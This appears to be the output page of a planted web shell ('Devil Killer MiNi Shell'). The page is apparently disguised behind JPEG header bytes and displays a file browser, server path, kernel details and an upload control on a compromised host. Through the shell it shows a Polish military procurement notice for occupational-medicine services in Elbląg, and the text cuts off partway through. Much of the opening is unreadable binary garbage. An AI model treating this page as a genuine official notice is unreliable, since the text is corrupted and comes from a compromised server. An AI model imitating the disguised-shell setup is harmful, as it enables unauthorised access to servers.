JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231027/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231027/0046587601-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> USŁUGI MEDYCZNE Z ZAKRESU MEDYCYNY PRACY NA 2024 R. <br/>DLA ŻOŁNIERZY, ŻOŁNIERZY DZSW I PRACOWNIKÓW RON Z JEDNOSTEK I INSTYTUCJI WOJSKOWYCH BĘDĄCYCH NA ZAOPATRZENIU 21WOG </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">21 Wojskowy Oddział Gospodarczy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 281385396</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kwiatkowskiego 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Elbląg</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">82-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL621 - Elbląski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">21wog@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://21wog.wp.mil.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> 21 Wojskowy Oddział Gospodarczy </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> USŁUGI MEDYCZNE Z ZAKRESU MEDYCYNY PRACY NA 2024 R. <br/>DLA ŻOŁNIERZY, ŻOŁNIERZY DZSW I PRACOWNIKÓW RON Z JEDNOSTEK I INSTYTUCJI WOJSKOWYCH BĘDĄCYCH NA ZAOPATRZENIU 21WOG </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-61ddad1d-73fa-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00465876</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-10-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00127407/19/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.11 USŁUGI MEDYCZNE Z ZAKRESU MEDYCYNY PRACY W 2024 R. DLA ŻOŁNIERZY I PRACOWNIKÓW RON Z JEDNOSTEK I INSTYTUCJI WOJSKOWYCH BĘDĄ CYCH NA ZAOPATRZENIU 21 WOG</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/21wog <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://portal.smartpzp.pl/21wog</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne<br/>wysyłania i odbierania dokumentów elektronicznych i informacji przekazywanych przy ich użyciu zostały opisane<br/>w Regulaminie korzystania z usług Systemu (Regulamin Portalu e-Usług) dostępnym z poziomu modułu E-learning dla wszystkich<br/>użytkowników Systemu oraz podczas rejestracji konta Wykonawcy dla Wykonawców</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) <br/>(Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>	Administratorem Pani/Pana danych osobowych jest 21 Wojskowy Oddział Gospodarczy w Elblągu, ul. Kwiatkowskiego 15, 82-300 Elbląg, e-mail: 21wog@ron.mil.pl;<br/>	Administrator wyznaczył Inspektora Ochrony Danych, z którym można się kontaktować w sprawach związanych z danymi osobowymi pod adresem e-mail: 21wog@ron.mil.pl;<br/>	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO <br/>w celu związanym z postępowaniem o udzielenie zamówienia publicznego na: <br/><br/>„USŁUGI MEDYCZNE Z ZAKRESU MEDYCYNY PRACY NA 2024 R. DLA ŻOŁNIERZY, ŻOŁNIERZY DOBROWOLNEJ ZASADNICZEJ SŁUŻBY WOJSKOWEJ I PRACOWNIKÓW RON Z JEDNOSTEK I INSTYTUCJI WOJSKOWYCH BĘDĄCYCH NA ZAOPATRZENIU 21WOG” <br/><br/>nr postępowania 66/SZP/US/2023;<br/>	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania. <br/>	Pani/Pana dane osobowe będą przechowywane przez okres 5 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 5 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane <br/>w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest <br/>art. 6 ust. 1 lit. c RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">J.W.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">21WOG-SZP.2712.67.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> USŁUGI MEDYCZNE Z ZAKRESU MEDYCYNY PRACY NA 2024 R. DLA ŻOŁNIERZY, ŻOŁNIERZY DOBROWOLNEJ ZASADNICZEJ SŁUŻBY WOJSKOWEJ I PRACOWNIKÓW RON Z JEDNOSTEK I INSTYTUCJI WOJSKOWYCH BĘDĄCYCH NA ZAOPATRZENIU 21WOG <br/> <br/>KOD CPV:<br/>85121000 – 3 – usługi medyczne<br/>1.	Przedmiotem zamówienia dla części zamówienia nr 1, są usługi medyczne obejmujące profilaktyczne badania lekarskie (wstępne, okresowe, kontrolne, sanitarno – epidemiologiczne, badania diagnostyczne, badania laboratoryjne, konsultacje specjalistyczne) żołnierzy, żołnierzy Dobrowolnej Zasadniczej Służby Wojskowej i pracowników RON, przeprowadzanie badań lekarskich i psychologicznych pracowników ochrony fizycznej, prowadzenie dyspensaryzacji w stosunku do żołnierzy, kwalifikowanie i kierowanie żołnierzy na turnusy leczniczo-profilaktyczne, wykonywanie czynności lekarskich w zakresie udziału w posiedzeniach komisji BHP i społecznych przeglądach stanowisk służby i pracy. Usługi te realizowane będą dla żołnierzy, żołnierzy DZSW i pracowników RON Jednostek i Instytucji Wojskowych z Garnizonu Elbląg, będącego na zaopatrzeniu 21WOG.<br/>Szczegółowe zestawienie wykazu czynności (rodzaju badań) wchodzących w skład przedmiotu zamówienia stanowi załączniki nr 1 do opisu przedmiotu zamówienia (OPZ) .<br/>2.	Przedmiot zamówienia będzie realizowany zgodnie z obowiązkiem pracodawcy wynikającym z przepisów prawa, w szczególności: art. 229 ustawy z dnia 26 czerwca 1974 r. Kodeks Pracy (tj. Dz.U. z 2023 r., poz. 1465), Ustawy z dnia 27 czerwca 1997 r. o służbie medycyny pracy (t.j. Dz.U. z 2022 poz. 437), Rozporządzeniem Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 r. w sprawie przeprowadzania badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie Pracy (Dz. U. 2023, poz. 607), Rozporządzeniem Ministra Zdrowia z dnia 5 grudnia 2022 r. w sprawie badań lekarskich osób ubiegających się o uprawnienia do kierowania pojazdami i kierowców (tj. Dz.U. z 2022 r., poz.2503), Rozporządzeniem Ministra Zdrowia z dnia 8 lipca 2014 r. w sprawie badań psychologicznych osób ubiegających się o uprawnienia do kierowania pojazdami, kierowców oraz osób wykonujących pracę na stanowisku kierowcy (Dz. U. z 2022 r., poz. 165 z późn.zm.) oraz przepisów resortowych:<br/> Ustawy z dnia 11 marca 2022 r. o obronie Ojczyzny (t.j. Dz.U. z 2022 r., poz. 2305 z późn. zm.), Rozporządzeniem Ministra Obrony Narodowej z dnia 9 sierpnia 2010 r. w sprawie służby medycyny pracy w jednostkach organizacyjnych podległych Ministrowi Obrony Narodowej (Dz. U. 2010 Nr 187 poz. 1257), Zarządzeniem Nr 12/MON z dnia 21 maja 2013 roku w sprawie utworzenia, przekształcenia i likwidacji podmiotów leczniczych w formie jednostki budżetowej z późn. zm. <br/>Badania lekarskie do celów sanitarno - epidemiologicznych wykonywane będą w oparciu o Ustawę z dnia 5 grudnia 2008 r. o zapobieganiu i zwalczaniu zakażeń i chorób zakaźnych u ludzi (tj. Dz. U. z 2023 r., poz. 1284 z poźn. zm.). <br/>Badania pracowników ochrony fizycznej realizowane będą zgodnie z Rozporządzeniem Ministra Zdrowia z dnia 21 grudnia 2015 r. w sprawie badań lekarskich i psychologicznych osób ubiegających się o wpis lub posiadających wpis na listę kwalifikowanych pracowników ochrony fizycznej (Dz.U.2022, poz.2344). <br/>Wykonywanie czynności lekarskich w zakresie udział w posiedzeniach komisji BHP i społecznych przeglądach stanowisk służby i pracy, realizowane będą zgodnie z przepisami Ustawy z dnia 26 czerwca 1974 r. - Kodeks Pracy, (art. 237, Dz.U. z 2023 r., poz. 1465).<br/>Wykonawca akceptuje fakt, iż ilości badań lekarskich, laboratoryjnych, diagnostycznych i konsultacji specjalistycznych wyszczególnionych w poszczególnych częściach zamówienia są ilościami szacunkowymi i służyć będą wyłącznie do wyliczenia ceny oferty i wyboru Wykonawcy. Użyte przez Wykonawcę, (który złoży ofertę najkorzystniejszą) do obliczenia ceny oferowanej, ceny jednostkowe, będą stałe w okresie obowiązywania umowy.<br/>3.	Zamawiający nie ponosi konsekwencji finansowych zmniejszenia ilości badań.<br/>4.	Zamawiający zastrzega możliwość nie wykorzystania kwoty umowy w pełnej wysokości.<br/>5.	Wykonawcy należy się wynagrodzenie za faktycznie przeprowadzone badania.<br/>6.	Badanie profilaktyczne zakończone zostanie wydaniem zaświadczenia lekarskiego z przeprowadzonych badań na obowiązującym formularzu lub wydaniem wyników badań, które zlecił lekarz medycyny pracy.<br/>7.	Wykonawca zobowiązuje się prowadzić dokumentację medyczną pacjentów zgodnie z obowiązującymi przepisami w tym zakresie.<br/>8.	Wykonawca zobowiązuje się realizować procedurę odwoławczą zgodnie z zapisami Rozporządzenia Ministra Obrony Narodowej z dnia 9 sierpnia 2010 r. w sprawie służby medycyny pracy w jednostkach organizacyjnych podległych Ministrowi Obrony Narodowej (Dz. U. 2010, Nr 187 poz. 1257).<br/>9.	Wykonawca, który będzie realizował przedmiot zamówienia musi być wpisany do rejestru podmiotów wykonujących działalność leczniczą, o którym mowa w art. 100 i 106 ustawy <br/>z dnia 15 kwietnia 2011 r. o działalności leczniczej (t.j. Dz. U. z 2023, poz. 991 z późn.zm.) i posiadać aktualne ubezpieczenie OC, zgodnie z Rozporządzeniem Ministra Finansów z dnia 29 kwietnia 2019 r. w sprawie obowiązkowego ubezpieczenia odpowiedzialności cywilnej podmiotu wykonującego działalność leczniczą (Dz. U. z 2019 r. poz. 866 z późn. zm.).<br/><br/>CZĘŚĆ ZAMÓWIENIA NR 1 – BADANIA PROFILAKTYCZNE ŻOŁNIERZE GARNIZON ELBLĄG, BADANIA PROFILAKTYCZNE PRACOWNICY CYWILNI GARNIZON ELBLĄG:<br/>Wykaz jednostek i instytucji wojskowych z Garnizonu Elbląg do zaopatrywania w usługi medyczne z zakresu medycyny pracy:<br/>- 21 Wojskowy Oddział Gospodarczy w Elblągu;<br/>- Pułk Wsparcia Dowodzenia DWD P-W w Elblągu;<br/>- Dowództwo Wielonarodowej Dywizji Północny-Wschód w Elblągu;<br/>- Regionalne Centrum Informatyki w Elblągu;<br/>- Wojskowe Centrum Rekrutacji w Elblągu;<br/>- Orkiestra Wojskowa w Elblągu;<br/>- 16 pułk logistyczny w Elblągu;<br/>- Oddział Żandarmerii Wojskowej w Elblągu;<br/>- 2dplot 15 pułku przeciwlotniczego w Elblągu;<br/>- Skład Materiałowy 2 RBLog w Elblągu;<br/>- Parafia Wojskowa w Elblągu;<br/>- Kompania Chemiczna Batalionu Dowodzenia w Elblągu.<br/>1.	Usługi medyczne obejmujące przedmiot zamówienia muszą być wykonywane <br/>w Elblągu.<br/>2.	Badania wykonywane będą na podstawie skierowania wystawionego żołnierzowi/żołnierzowi DZSW/pracownikowi RON przez pracodawcę do lekarza medycyny pracy, które będzie zawierało dane dotyczące zajmowanego stanowiska, czynników szkodliwych dla zdrowia lub warunków uciążliwych.<br/>3.	Lekarz medycyny pracy w oparciu o w/w skierowanie określa zakres badań i konsultacji. <br/>4.	Wykonawca wykona badania i konsultacje specjalistyczne oraz wystawi zaświadczenie lekarskie z przeprowadzonych badań okresowych w czasie zadeklarowanym przez Wykonawcę w ofercie. <br/>5.	Wykonawca po przeprowadzeniu badań wystawi zaświadczenie lekarskie z przeprowadzonych badań okresowych, które wręczy badanemu żołnierzowi/ żołnierzowi DZSW/ pracownikowi RON do rąk własnych (oryginał plus kopia). Zaświadczenie będzie zawierało termin następnego badania lekarskiego określone pełną datą tj. dzień, miesiąc i rok. <br/>6.	Wykonawca po przeprowadzeniu przez okulistę badań okulistycznych i po stwierdzeniu konieczności stosowania przez żołnierza/ żołnierza DZSW/ pracownika RON okularów korygujących wzrok przy obsłudze monitora ekranowego, udokumentuje konieczność korekcji wady wzroku, stosownym wpisem na zaświadczeniu lekarskim z przeprowadzonych badań okresowych i wystawi dodatkowe zaświadczenie lekarskie, (jeżeli jest wymagane przez pracodawcę).<br/>7.	Wykonawca realizować będzie usługi polegające na wykonywaniu czynności lekarskich w zakresie udziału w posiedzeniach komisji BHP i społecznych przeglądach stanowisk służby i pracy w Jednostkach i Instytucjach Wojskowych będących na zaopatrzeniu 21WOG.<br/>8.	Wykonawca będzie prowadził rejestr przyjmowanych żołnierzy/ żołnierzy DZSW pracowników RON zawierający: imię i nazwisko, numer PESEL, adres, nazwisko lekarza udzielającego świadczenia, datę badania i inne niezbędne dane do identyfikacji udzielonego świadczenia zdrowotnego.<br/>9.	Wykonawca prześle fakturę za wykonane usługi medycyny pracy, wystawioną oddzielnie za każdą jednostkę i instytucję wojskową wraz z imiennym, sporządzonym w sposób czytelny, wykazem przebadanych żołnierzy, żołnierzy DZSW i pracowników RON z nr pesel oraz rodzajem i ilością przeprowadzonych badań, łączną wartością przeprowadzonych badań oraz łączną ilością wykonanych badań. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85121000-3 - Usługi medyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-02 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">UWAGA:<br/>Określone w formularzu ofertowym ilości badań stanowią ilość szacunkową. Wyliczona dla tych ilości cena brutto oferty będzie służyła do porównania złożonych w postępowaniu ofert.<br/>Wartością umowy dla każdej części zamówienia będzie kwota środków przeznaczonych na sfinansowanie zamówienia (odpowiednio dla części zamówienia).<br/>1.	Przy wyborze najkorzystniejszej oferty dla części zamówienia nr 1 Zamawiający będzie się kierował następującymi kryteriami: <br/>1)	Cena brutto oferty - 60%<br/><br/> najniższa oferowana cena brutto <br/>Liczba punktów = ------------------------------------------- x 100 pkt x 60%<br/>cena brutto oferty badanej<br/><br/>2) Czas wykonania badań profilaktycznych, specjalistycznych oraz wystawienia zaświadczenia – 40%<br/>•	w ciągu jednego dnia roboczego od okazania skierowania przez żołnierza/żołnierza DZSW/pracownika RON: 40 pkt<br/>•	w ciągu dwóch dni roboczych od okazania skierowania przez żołnierza/żołnierza DZSW/pracownika RON: 20 pkt<br/>•	od trzech do pięciu dni roboczych od okazania skierowania przez żołnierza/żołnierza DZSW/pracownika RON: 0 pkt<br/><br/>2.	Liczba punktów uzyskanych przez daną ofertę będzie wyliczana według wzoru: <br/>1)	dla części zamówienia nr 1<br/>P = K1 +K2 <br/>P - liczba punktów uzyskanych przez daną ofertę w obu kryteriach;<br/>K1 - liczba punktów uzyskanych przez daną ofertę w kryterium „Cena brutto oferty”;<br/>K2 - liczba punktów uzyskanych przez daną ofertę w kryterium „Czas wykonania badań profilaktycznych, specjalistycznych oraz wystawienia zaświadczenia”; <br/><br/><br/><br/>3.	Oferta będzie podlegać ocenie dla każdej części zamówienia. Punkty będą liczone z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.<br/>5.	Za ofertę najkorzystniejszą zostanie uznana ta oferta spośród złożonych, która uzyska najwyższą liczbę punktów. Maksymalna liczba punktów, jaką może osiągnąć oferta wynosi 100.<br/>6.	Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas wykonania badań profilaktycznych, specjalistycznych oraz wystawienia zaświadczenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> USŁUGI MEDYCZNE Z ZAKRESU MEDYCYNY PRACY NA 2024 R. DLA ŻOŁNIERZY, 